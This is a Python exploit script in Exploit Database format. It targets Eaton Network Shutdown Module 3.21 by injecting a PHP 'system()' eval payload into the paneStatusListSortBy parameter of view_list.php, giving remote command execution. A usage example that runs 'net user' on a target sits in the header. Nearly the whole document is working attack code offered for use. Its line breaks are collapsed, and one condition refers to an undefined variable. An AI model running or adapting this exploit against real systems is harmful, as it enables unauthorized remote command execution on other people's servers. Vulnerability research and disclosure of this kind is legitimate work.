#!/usr/bin/env python# # Quick 'n' Dirty - Metasploit module didn't do it for me# 2013 - Filip Waeytens - http://www.wsec.be## Usage Example:##~$ python eaton.py 192.168.1.9 "net user"##User accounts for \\##-------------------------------------------------------------------------------#GuestLocalAdmin #The command completed with one or more errors.## Exploit Title: Eaton shutdown module php eval exploit# Date: 5 dec2013# Exploit Author: Filip Waeytens# Vendor Homepage: powerquality.eaton.com# Software Link: http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp# Version: 3.21# Tested on: WIN#References:###Exploit Database: 23006###Secunia Advisory ID: 49103###Bugtraq ID: 54161###Related OSVDB ID: 83200 83201###Packet Storm: http://packetstormsecurity.org/files/118420/Network-Shutdown-Module-3.21-Remote-PHP-Code-Injection.html#import httplib
import urllib
import sys
import BeautifulSoup
#### First argument is the target IP - port defaults to 4679
targetip = sys.argv[1]
command = sys.argv[2]
targetport=4679#### if a command has spaces: put between double quotes, the next lines strip the quotesif command.startswith('"')and string.endswith('"'):
command = command[1:-1]#### build the urL to request
baserequest ="/view_list.php?paneStatusListSortBy="
wrappedcommand="${@print(system(\""+command+"\"))}"
ue_command = urllib.quote_plus(wrappedcommand)#### send request
conn = httplib.HTTPConnection(targetip+":"+str(targetport))
conn.request("GET", baserequest+ue_command)
r1 = conn.getresponse()#print "Getting answer: "#print r1.status, r1.reason#print "sent http://"+targetip+":"+str(targetport)+baserequest+ue_command
data1 = r1.read()#### extract answer
soup = BeautifulSoup.BeautifulSoup(data1)for p in soup.findAll("p"):#print dir(p)#strip first line
result = p.getText().split("Warning")[0]print result.replace("Multi-source information on the power devices suppying the protected server","",1)
